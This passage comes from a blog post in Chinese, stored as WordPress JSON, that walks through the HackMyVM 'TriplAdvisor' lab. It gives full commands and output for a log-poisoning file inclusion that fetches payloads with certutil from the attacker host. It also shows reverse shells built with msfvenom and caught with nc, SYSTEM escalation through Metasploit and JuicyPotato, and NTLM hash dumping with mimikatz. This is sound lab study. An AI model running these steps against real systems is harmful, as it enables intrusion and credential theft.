45 exploit\/windows\/local\/win_error_cve_2023_36874 No The target is not exploitable.\n\n[*] Post module execution completed<\/code><\/pre>\n# kali3\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/pentest.exe+C:\\Windows\\Temp\\pentest.exe"\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1" 200 5728866 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 272 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 504 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 736 "-" "curl\/8.8.0"\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 968 "-" "curl\/8.8.0"\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] "GET \/ HTTP\/1.1" 302 - "-" "curl\/8.10.1"\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1" 200 1288 "-" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] "GET \/wordpress\/ HTTP\/1.1" 200 22542 "-" "**** Online ****\n 0000 ...\n 1c00\nCertUtil: -URLCache command completed successfully.\n"\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] "POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1" 200 - "http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000" "WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress"\n192.168.10.101 - - [04\/Jun\/2025:15:08:35 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=dir HTTP\/1.1" 200 2754 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:15:40:23 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/revshell.exe+C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 200 2326 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:15:43:49 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:15:45:59 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:04:32 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 200 3129 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:08:24 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 200 3405 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:11:23 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n192.168.10.101 - - [04\/Jun\/2025:16:36:03 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=C:\\\\Windows\\\\Temp\\\\revshell.exe HTTP\/1.1" 500 1640 "-" "curl\/8.5.0"\n{"success":true,"data":{"output":[]}} \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=C:\\Windows\\Temp\\pentest.exe" \n<\/code><\/pre>\nmsf\u63d0\u6743<\/h3>\n
\u53d1\u73b0\u670d\u52a1\u5668\u7684\u578b\u53f7\u548c\u91cc\u9762\u5bf9\u5e94\u4e0a\u4e86Windows Server 2008 R2 (6.1 Build 7600).<\/code>\uff0c\u770b\u5e08\u5085\u4eec\u7684\u535a\u5ba2\u4f3c\u4e4e\u8bf4SeImpersonatePrivilege<\/code>\u6743\u9650\u53ef\u4ee5\u4f7f\u7528JuicyPotato<\/code>\u8fdb\u884c\u63d0\u6743\uff0c\u8bd5\u4e00\u4e0bmsf\uff1a<\/p>\nmsf6 post(multi\/recon\/local_exploit_suggester) > use exploit\/windows\/local\/ms16_075_reflection_juicy\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > options\n\nModule options (exploit\/windows\/local\/ms16_075_reflection_juicy):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n CLSID {4991d34b-80a1-4291-83b6-3328366b9097} yes Set CLSID value of the DCOM to trigger\n SESSION yes The session to run this module on\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST 10.0.2.4 yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\nExploit target:\n\n Id Name\n -- ----\n 0 Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > set session 1\nsession => 1\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > set lhost 192.168.10.101\nlhost => 192.168.10.101\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > set lport 2345\nlport => 2345\nmsf6 exploit(windows\/local\/ms16_075_reflection_juicy) > run\n\n[*] Started reverse TCP handler on 192.168.10.101:2345 \n[+] Target appears to be vulnerable (Windows 2008 R2)\n[*] Launching notepad to host the exploit...\n[+] Process 3052 launched.\n[*] Reflectively injecting the exploit DLL into 3052...\n[*] Injecting exploit into 3052...\n[*] Exploit injected. Injecting exploit configuration into 3052...\n[*] Configuration injected. Executing exploit...\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n[*] Sending stage (176198 bytes) to 192.168.10.103\n[*] Meterpreter session 2 opened (192.168.10.101:2345 -> 192.168.10.103:49190) at 2025-06-04 04:08:37 -0400\n\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM\nmeterpreter > shell\nProcess 2580 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>cd c:\/users\/administrator\/desktop\ncd c:\/users\/administrator\/desktop\n\nc:\\Users\\Administrator\\Desktop>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\Administrator\\Desktop\n\n08\/15\/2024 09:02 PM <DIR> .\n08\/15\/2024 09:02 PM <DIR> ..\n06\/30\/2024 10:10 AM 33 root.txt\n 1 File(s) 33 bytes\n 2 Dir(s) 23,797,780,480 bytes free\n\nc:\\Users\\Administrator\\Desktop>type root.txt\ntype root.txt\n5b38df6802c305e752c8f02358721acc<\/code><\/pre>\n\u63d0\u6743\u6210\u529f\u3002<\/p>\n
JuicyPotato\u63d0\u6743<\/h3>\n
\u5982\u679c\u4e0d\u4f7f\u7528msf\u7684\u8bdd\uff0c\u9700\u8981\u4f7f\u7528\u4e00\u4e9b\u76f8\u5173\u5de5\u5177\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
\n\n- https:\/\/github.com\/ohpe\/juicy-potato\/releases\/download\/v0.1\/JuicyPotato.exe<\/a><\/li>\n<\/ul>\n<\/blockquote>\n
\u5de5\u5177\u7684\u4f7f\u7528\u5177\u4f53\u53c2\u8003\uff1ahttps:\/\/ohpe.it\/juicy-potato\/<\/a><\/p>\n\u8ddf\u7740ta0\u795e<\/a>\u505a\u5c31\u5b8c\u4e86\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\n<\/div><\/p>\n\u627e\u5230\u6211\u4eec\u60f3\u8981\u7684\uff0c\u7136\u540e\u4e0b\u5230\u9776\u673a\u4e0a\uff1a<\/p>\n
\n\n- https:\/\/github.com\/ohpe\/juicy-potato\/blob\/master\/CLSID\/Windows_Server_2008_R2_Enterprise\/CLSID.list<\/a><\/li>\n
- https:\/\/ohpe.it\/juicy-potato\/Test\/test_clsid.bat<\/a><\/li>\n<\/ul>\n<\/blockquote>\n
\u8fd9\u91cc\u4e0d\u884c\u5c31\u91cd\u542f\u4e86\u4e00\u4e0b\u9776\u673a\u3002\u3002\u8fd9\u91cc\u6ce8\u610f\u4e0d\u8981\u4e0b\u8f7d\u5230temp\u76ee\u5f55\uff0c\u597d\u50cf\u6267\u884c\u4e0d\u4e86\u3002\u3002<\/p>\n
\u9996\u5148\u4e0b\u8f7d\u76f8\u5173\u7684\u6d4b\u8bd5\u811a\u672c<\/h4>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 1234\nlistening on [any] 1234 ...\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49190\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes>cd c:\/users\ncd c:\/users\n\nc:\\Users>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\n\n06\/29\/2024 01:26 PM <DIR> .\n06\/29\/2024 01:26 PM <DIR> ..\n06\/29\/2024 08:09 PM <DIR> Administrator\n07\/13\/2009 09:52 PM <DIR> Public\n06\/29\/2024 08:11 PM <DIR> websvc\n 0 File(s) 0 bytes\n 5 Dir(s) 23,796,097,024 bytes free\n\nc:\\Users>cd websvc\/desktop\ncd websvc\/desktop\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/CLSID.list\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/CLSID.list\n**** Online ****\n 0000 ...\n 37c2\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/JuicyPotato.exe\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/JuicyPotato.exe\n**** Online ****\n 000000 ...\n 054e00\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/test_clsid.bat\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/test_clsid.bat\n**** Online ****\n 0000 ...\n 011d\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>test_clsid.bat\ntest_clsid.bat\n{72A7994A-3092-4054-B6BE-08FF81AEEFFC} 10000\n{84D586C4-A423-11D2-B943-00C04F79D22F} 10000\n{b8f87e75-d1d5-446b-931c-3f61b97bca7a} 10000\n{4D111E08-CBF7-4f12-A926-2C7920AF52FC} 10000\n{3B35075C-01ED-45bc-9999-DC2BBDEAC171} 10000\n{228fb8f7-fb53-4fd5-8c7b-ff59de606c5b} 10000\n{01D0A625-782D-4777-8D4E-547E6457FAD5} 10000\n{4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} 10000\n{010911E2-F61C-479B-B08C-43E6D1299EFE} 10000\n{2b72133b-3f5b-4602-8952-803546ce3344} 10000\n{86d5eb8a-859f-4c7b-a76b-2bd819b7a850} 10000\n{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B} 10000\n{3be9934e-4d1f-4e31-8bc3-8efc710ee0f2} 10000\n{87BB326B-E4A0-4de1-94F0-B9F41D0C6059} 10000\n{E6442437-6C68-4f52-94DD-2CFED267EFB9} 10000\n{6d8ff8e0-730d-11d4-bf42-00b0d0118b56} 10000\n{853c9738-9e98-45af-aef4-dc0c6237b388} 10000\n------------------------\n\nc:\\Users\\websvc\\Desktop>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\websvc\\Desktop\n\n06\/04\/2025 05:48 PM <DIR> .\n06\/04\/2025 05:48 PM <DIR> ..\n06\/04\/2025 05:47 PM 14,274 CLSID.list\n06\/04\/2025 05:47 PM 347,648 JuicyPotato.exe\n06\/04\/2025 05:56 PM 1,101 result.log\n06\/04\/2025 05:48 PM 285 test_clsid.bat\n06\/30\/2024 10:10 AM 33 user.txt\n 5 File(s) 363,341 bytes\n 2 Dir(s) 23,792,906,240 bytes free\n\nc:\\Users\\websvc\\Desktop>type result.log\ntype result.log\n{9678f47f-2435-475c-b24a-4606f8161c16};TRIPLADVISOR\\websvc\n{98068995-54d2-4136-9bc9-6dbcb0a4683f};TRIPLADVISOR\\websvc\n{0289a7c5-91bf-4547-81ae-fec91a89dec5};TRIPLADVISOR\\websvc\n{9acf41ed-d457-4cc1-941b-ab02c26e4686};TRIPLADVISOR\\websvc\n{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\\SYSTEM\n{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\\SYSTEM\n{F087771F-D74F-4C1A-BB8A-E16ACA9124EA};NT AUTHORITY\\SYSTEM\n{6d18ad12-bde3-4393-b311-099c346e6df9};NT AUTHORITY\\SYSTEM\n{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\\SYSTEM\n{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\\LOCAL SERVICE\n{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\\LOCAL SERVICE\n{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\\LOCAL SERVICE\n{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\\SYSTEM\n{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\\SYSTEM\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\\SYSTEM\n{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\\SYSTEM\n{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\\SYSTEM\n# \u8fd9\u91cc\u7684\u6bcf\u4e2aNT AUTHORITY\\SYSTEM\u90fd\u662f\u53ef\u4ee5\u7528\u7684<\/code><\/pre>\n\u7136\u540e\u5229\u7528\u76f8\u5173\u5de5\u5177\u63d0\u6743\uff1a<\/p>\n
c:\\Users\\websvc\\Desktop>JuicyPotato.exe\nJuicyPotato.exe\nJuicyPotato v0.1 \n\nMandatory args: \n-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both\n-p <program>: program to launch\n-l <port>: COM server listen port\n\nOptional args: \n-m <ip>: COM server listen address (default 127.0.0.1)\n-a <argument>: command line argument to pass to program (default NULL)\n-k <ip>: RPC server ip address (default 127.0.0.1)\n-n <port>: RPC server listen port (default 135)\n-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})\n-z only test CLSID and print token's user\n\nc:\\Users\\websvc\\Desktop>JuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nJuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nTesting {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 2345\n....\n[+] authresult 0\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK\n\nc:\\Users\\websvc\\Desktop>JuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revrootshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\nJuicyPotato.exe -l 2345 -p c:\\Users\\websvc\\Desktop\\revrootshell.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}\n# \u8fd9\u91cc\u8fd9\u4e2a-l\u5e94\u8be5\u662f\u4e00\u4e2a\u8f6c\u63a5\u7aef\u53e3\uff0c\u9009\u4e00\u4e2a\u4e0d\u5e38\u7528\u7684\u5c31\u884c\nTesting {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 2345\n....\n[+] authresult 0\n{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK<\/code><\/pre>\n\u8fd9\u91cc\u662f\u4e2d\u95f4\u8fdb\u884c\u4e0b\u8f7d\u7684\u8bb0\u5f55\u4ee5\u53ca\u65b0\u53cd\u5f39shell\u7684\u751f\u6210\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ ll \ntotal 392\n-rw-r--r-- 1 kali kali 2246 Jun 4 00:59 44340.txt\n-rw-r--r-- 1 kali kali 14274 Jun 4 04:41 CLSID.list\n-rw-r--r-- 1 kali kali 347648 Dec 6 2021 JuicyPotato.exe\n-rw-r--r-- 1 kali kali 7168 Jun 4 03:48 pentest.exe\ndrwxr-xr-x 3 root root 4096 Jun 4 00:14 reports\n-rw-r--r-- 1 kali kali 87 Jun 4 00:51 reports.json\ndrwxr-xr-x 3 kali kali 4096 Jun 4 00:51 Result\n-rw-r--r-- 1 kali kali 7168 Jun 4 02:28 revshell.exe\n-rw-r--r-- 1 kali kali 285 Jun 4 04:41 test_clsid.bat\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 04:43:33] "GET \/revshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:43:33] "GET \/revshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:09] "GET \/CLSID.list HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:09] "GET \/CLSID.list HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:34] "GET \/JuicyPotato.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:34] "GET \/JuicyPotato.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:53] "GET \/test_clsid.bat HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 04:47:53] "GET \/test_clsid.bat HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:00:39] "GET \/revshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:00:42] "GET \/revshell.exe HTTP\/1.1" 200 -\n^C\n[!] Exiting!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom --payload windows\/x64\/shell_reverse_tcp LHOST=192.168.10.101 LPORT=2345 -f exe -o revrootshell.exe \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes\nSaved as: revrootshell.exe\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888 \n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 05:09:56] "GET \/revrootshell.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 05:09:56] "GET \/revrootshell.exe HTTP\/1.1" 200 -\n^C\n[!] Exiting!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 2345\nlistening on [any] 2345 ...\nwhoami\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49636\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nnt authority\\system\n\nC:\\Windows\\system32><\/code><\/pre>\n\u6700\u540e\u5f97\u5230\u4e86rootshell\uff01<\/p>\n
\u7968\u636e\u7684\u5229\u7528<\/h2>\n
\u8fd9\u91cc\u5c31\u83b7\u53d6rootflag\u6765\u8bf4\u5df2\u7ecf\u7ed3\u675f\u4e86\uff0c\u4f46\u662f\u8fd8\u53ef\u4ee5\u6709\u65b0\u7684\u62d3\u5c55\uff0c\u5177\u4f53\u53ef\u4ee5\u53c2\u8003\u8fd9\u4e2a\u5e08\u5085\u8bf4\u7684https:\/\/www.linuxsec.org\/2024\/10\/hackmyvm-tripladvisor-writeup.html \uff0c\u8fd9\u91cc\u4ec5\u590d\u73b0\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n
\u4f7f\u7528 Mimikatz<\/code> \u8fdb\u884c\u63d0\u53d6\uff0c\u7136\u540e\u8fdb\u884c\u5229\u7528impacket-psexec<\/code>\u8fdb\u884c\u767b\u5f55<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 2345\nlistening on [any] 2345 ...\nwhoami\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49636\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nnt authority\\system\n\nC:\\Windows\\system32>cd c:\\Users\\websvc\\Desktop\ncd c:\\Users\\websvc\\Desktop\n\nc:\\Users\\websvc\\Desktop>certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/mimikatz.exe\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/mimikatz.exe\n**** Online ****\n 000000 ...\n 131308\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop>mimikatz.exe privilege::debug token::elevate lsadump::sam exit\nmimikatz.exe privilege::debug token::elevate lsadump::sam exit\n\n .#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36\n .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)\n ## \/ \\ ## \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ## > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com ***\/\n\nmimikatz(commandline) # privilege::debug\nPrivilege '20' OK\n\nmimikatz(commandline) # token::elevate\nToken Id : 0\nUser name : \nSID name : NT AUTHORITY\\SYSTEM\n\n236 {0;000003e7} 0 D 7912 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,30p) Primary\n -> Impersonated !\n * Process Token : {0;000003e7} 0 D 655950 NT AUTHORITY\\SYSTEM S-1-5-18 (23g,27p) Primary\n * Thread Token : {0;000003e7} 0 D 663742 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,30p) Impersonation (Delegation)\n\nmimikatz(commandline) # lsadump::sam\nDomain : TRIPLADVISOR\nSysKey : 129514b2fa60646a00037e4df6fc3d3f\nLocal SID : S-1-5-21-2621822639-2474692399-1676906194\n\nSAMKey : d8c54e5c64e72b5baade016eaca4eea6\n\nRID : 000001f4 (500)\nUser : Administrator\n Hash NTLM: 2176416a80e4f62804f101d3a55d6c93\n\nRID : 000001f5 (501)\nUser : Guest\n\nRID : 000003eb (1003)\nUser : websvc\n Hash NTLM: b0a913673f4f8d5debc49f8fcbbdbb68\n\nmimikatz(commandline) # exit\nBye!<\/code><\/pre>\n<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"TriplAdvisor \u8fd9\u91cc\u9776\u673a\u662f\u4ec5\u4e3b\u673a\uff0c\u6839\u636e\u81ea\u5df1\u7684\u60c5\u51b5\u8fdb\u884c\u4fee\u6539\uff1a \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80k […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-830","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=830"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830\/revisions"}],"predecessor-version":[{"id":831,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830\/revisions\/831"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=830"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
